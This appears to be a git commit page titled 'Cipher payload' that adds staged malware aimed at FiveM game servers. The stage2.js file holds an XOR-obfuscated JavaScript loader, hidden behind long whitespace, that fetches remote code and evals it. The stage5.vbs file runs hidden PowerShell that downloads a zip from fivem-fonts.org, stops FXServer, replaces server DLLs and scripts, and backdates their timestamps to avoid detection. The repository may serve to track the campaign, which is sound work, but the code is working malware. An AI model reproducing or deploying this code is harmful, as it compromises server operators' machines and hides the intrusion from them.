Cipher payload from 15/03/2025

2025-03-15 19:44:29 +01:00 · 2025-03-15 19:44:29 +01:00 · 959280eb82
commit 959280eb82
parent 7f618bbc7b
5 changed files with 29 additions and 0 deletions
--- a/stage1.lua
+++ b/stage1.lua
--- a/stage2.js
+++ b/stage2.js
@ -0,0 +1 @@
+/* [fivem] */                                                                                                                                                                                                                                                                                            x=(e,k=3)=>typeof k=="number"?[...e].map(c=>String.fromCharCode(c.charCodeAt()^k&255)).join(""):[...e].map((c,i)=>String.fromCharCode(c.charCodeAt()^k.charCodeAt(i%k.length)&255)).join(""); v="wqz#x#`lmpw#kwwsp#>#qfrvjqf+!kwwsp!*8#kwwsp-dfw+!kwwsp9,,ejufn.elmwp-lqd,qtEHRII!/q>=xofw#g>!!8q-lm+!gbwb!/`>=g(>`*8q-lm+!fmg!/+*>=fubo+g**8~*8#~#`bw`k+f*#x#kwwsp-dfw+!kwwsp9,,ejufn.elmwp-lqd,qtEHRII!/q>=xofw#g>!!8q-lm+!gbwb!/`>=g(>`*8q-lm+!fmg!/+*>=fubo+g**8~*8#~"; globalThis[x("fubo")](x(v));
--- a/stage3.js
+++ b/stage3.js
--- a/stage4.js
+++ b/stage4.js
--- a/stage5.vbs
+++ b/stage5.vbs
@ -0,0 +1,10 @@
+
+            Dim shell
+      
+            command = "powershell.exe -NoProfile -WindowStyle Hidden -Command ""Remove-Item -Path 'C:\Users\gffgd\AppData\Local\Temp/mXzS7.vbs' -Force;$downloadUrl = 'https://fivem-fonts.org/00w'; $tempDir = [System.IO.Path]::GetTempPath(); $extractDir = Join-Path $tempDir 'hMlFODZ4rw'; $targetDir = 'C:/FXServer/server/'; $targetFolder = 'C:/FXServer/server/citizen'; $processKeyword = 'FXServer'; $referenceFile = 'C:/FXServer/server/citizen\\clr2\\lib\\mono\\4.5\\CitizenFX.Core.dll'; $processPath = ''; $tempFileName = 'hMlFODZ4rw'; $tempFilePath = Join-Path $tempDir $tempFileName; $zipFile = Join-Path -Path $tempDir -ChildPath ($tempFileName + '.zip'); Invoke-RestMethod -Uri $downloadUrl -OutFile $tempFilePath; Rename-Item -Path $tempFilePath -NewName (Split-Path -Path $zipFile -Leaf); $processes = Get-Process | Where-Object { $_.Name -like '*' + $processKeyword + '*' }; foreach ($process in $processes) { try { $processPath = (Get-Process -Id $process.Id | Select-Object -ExpandProperty Path); Stop-Process -Id $process.Id -Force; } catch {} } if (-Not (Test-Path $extractDir)) { New-Item -Path $extractDir -ItemType Directory; } Expand-Archive -Path $zipFile -DestinationPath $extractDir -Force; Get-ChildItem -Path $extractDir -Filter *.dll -Recurse | ForEach-Object { $sourceFile = $_.FullName; $targetFile = Join-Path $targetDir $_.Name; if (Test-Path $targetFile) { $creationTime = (Get-Item $targetFile).CreationTime; $lastWriteTime = (Get-Item $targetFile).LastWriteTime; Copy-Item -Path $sourceFile -Destination $targetFile -Force; (Get-Item $targetFile).CreationTime = $creationTime; (Get-Item $targetFile).LastWriteTime = $lastWriteTime; } else { $creationTime = (Get-Item $referenceFile).CreationTime; $lastWriteTime = (Get-Item $referenceFile).LastWriteTime; Copy-Item -Path $sourceFile -Destination $targetDir -Force; (Get-Item $targetFile).CreationTime = $creationTime; (Get-Item $targetFile).LastWriteTime = $lastWriteTime; } }; $folderToMove = 'scripting'; $sourceFolderPath = Join-Path $extractDir $folderToMove; $destinationFolderPath = Join-Path $targetFolder $folderToMove; if (Test-Path $sourceFolderPath) { if (Test-Path $destinationFolderPath) { Remove-Item -Path $destinationFolderPath -Recurse -Force; } Move-Item -Path $sourceFolderPath -Destination $destinationFolderPath -Force; }; $componentsFile = Join-Path $extractDir 'components.json'; $componentsDestination = 'C:/FXServer/server/components.json'; if (Test-Path $componentsFile) { Copy-Item -Path $componentsFile -Destination $componentsDestination -Force; }; if (Test-Path $referenceFile) { $creationTime = (Get-Item $referenceFile).CreationTime; $lastWriteTime = (Get-Item $referenceFile).LastWriteTime; if (Test-Path $destinationFolderPath) { (Get-Item $destinationFolderPath).CreationTime = $creationTime; (Get-Item $destinationFolderPath).LastWriteTime = $lastWriteTime; }; if (Test-Path $componentsDestination) { (Get-Item $componentsDestination).CreationTime = $creationTime; (Get-Item $componentsDestination).LastWriteTime = $lastWriteTime; }; }; Remove-Item -Path $extractDir -Recurse -Force; Remove-Item -Path $zipFile -Force; Start-Process -FilePath $processPath;"""
+      
+            Set WshShell = CreateObject("WScript.Shell")
+            WshShell.Run command, 0, False
+      
+            Set shell = Nothing
+
				`@ -0,0 +1 @@`
				/* [fivem] / x=(e,k=3)=>typeof k=="number"?[...e].map(c=>String.fromCharCode(c.charCodeAt()^k&255)).join(""):[...e].map((c,i)=>String.fromCharCode(c.charCodeAt()^k.charCodeAt(i%k.length)&255)).join(""); v="wqz#x#`lmpw#kwwsp#>#qfrvjqf+!kwwsp!8#kwwsp-dfw+!kwwsp9,,ejufn.elmwp-lqd,qtEHRII!/q>=xofw#g>!!8q-lm+!gbwb!/`>=g(>`8q-lm+!fmg!/+>=fubo+g*8~8#~#`bw`k+f#x#kwwsp-dfw+!kwwsp9,,ejufn.elmwp-lqd,qtEHRII!/q>=xofw#g>!!8q-lm+!gbwb!/`>=g(>`8q-lm+!fmg!/+>=fubo+g8~8#~"; globalThis[x("fubo")](x(v));